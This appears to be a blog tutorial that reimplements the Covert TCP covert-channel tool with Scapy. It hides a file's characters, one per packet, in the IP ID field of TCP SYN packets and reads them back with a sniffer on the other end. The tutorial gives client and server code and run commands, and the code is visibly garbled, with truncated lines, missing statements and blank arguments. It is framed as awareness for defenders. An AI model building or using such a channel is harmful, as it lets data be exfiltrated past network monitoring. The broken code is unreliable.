Covert Tcp - Scapy Version

Covert Tcp - Scapy Version

Covert Tcp is one of the tools for covert communication mentioned in the white hacking courses. Instead of sending information in the TCP/IP packet payload, the tool manipulates the TCP/IP headers. The logic is as simple as:

  • Assume you have a text file for sending
  • Read the file character by character
  • Send one TCP SYN packet per character and set the IP packet ID field or TCP initial sequence number field equals the current character
  • Sleep one second between packets sent in order to avoid being classified as SYN flood attack.

The C code is a little bit verbose and deals with the (complex) socket structures (iphdr, tcphdr, sockaddr_in), packet checksum calculation etc.

What if we have a tool that simplifies raw packet manipulation, having sensible defaults?

Scapy is such Python based tool for interactive packet crafting and manipulation. This tool has excellent documentation with a lot of practical examples and recipes.

The Covert TCP implementation with Scapy is really simple.

The client will send the 'secret' text through TCP/IP SYN packets with modified IP ID fields as:

 with open(file, "rt") as infile:
      while True:
          char =
          if not char:
          packet = IP(src=src, dst=dst, id=ord(char)) / TCP(
              sport=src_port, dport=dst_port, flags="S"


Note the character injection part, i.e. id = ord(char).

The server receives the message by sniffing the traffic received with very specific Berkeley Packet Filter (BPF):

outfile = None

def process_packet(packet):
    char = chr(packet["IP"].id)

. . . . . . . .
global outfile
outfile = open(file, "at")
outfile.writelines(["\nCovert Tcp started...\n"])
bpf = f"tcp and src host {src} and src port {src_port} and dst host {dst} and dst port {dst_port} and tcp[tcpflags] == tcp-syn"
print(f"Listening with BPF filter:\n{bpf}")
sniff(filter=bpf, prn=process_packet, store=0)

Note the character extraction part, i.e. char = chr(packet["IP"].id).

The complete server/client program is given below:

import getopt
import sys
import time
import atexit
from scapy.all import IP, TCP, send, sniff

outfile = None

def process_packet(packet):
    char = chr(packet["IP"].id)

def exit_handler():
    if outfile is not None:

def main():
    server = False

        opts, args = getopt.getopt(sys.argv[1:],"",
            ["src=", "dst=", "src-port=", "dst-port=", "file=", "server"])
    except getopt.GetoptError as err:

    for o, a in opts:
        if o == "--src":
            src = a
        elif o == "--dst":
            dst = a
        elif o == "--src-port":
            src_port = int(a)
        elif o == "--dst-port":
            dst_port = int(a)
        elif o == "--file":
            file = a
        elif o == "--server":
            server = True
            assert False, "unhandled option"

    if server:
        global outfile
        outfile = open(file, "at")
        outfile.writelines(["\nCovert Tcp started...\n"])
        bpf = f"tcp and src host {src} and src port {src_port} and dst host {dst} and dst port {dst_port} and tcp[tcpflags] == tcp-syn"
        print(f"Listening with BPF filter:\n{bpf}")
        sniff(filter=bpf, prn=process_packet, store=0)
        with open(file, "rt") as infile:
            while True:
                char =
                if not char:
                packet = IP(src=src, dst=dst, id=ord(char)) / TCP(
                    sport=src_port, dport=dst_port, flags="S"

if __name__ == "__main__":

Run the server as:

sudo python --src --dst 
--src-port 8081 --dst-port 8082 --file output.txt --server        

and the client as:

sudo python --src --dst 
--src-port 8081 --dst-port 8082 --file input.txt        

Long story short: all actors, regular and malicious, have powerful tools at their disposal. Creating various sophisticated tools does not always require kernel level programming skills. Understanding and being aware about these libraries will help Cybersecurity defenders prepare for various possible attack and data exfiltration scenarios.



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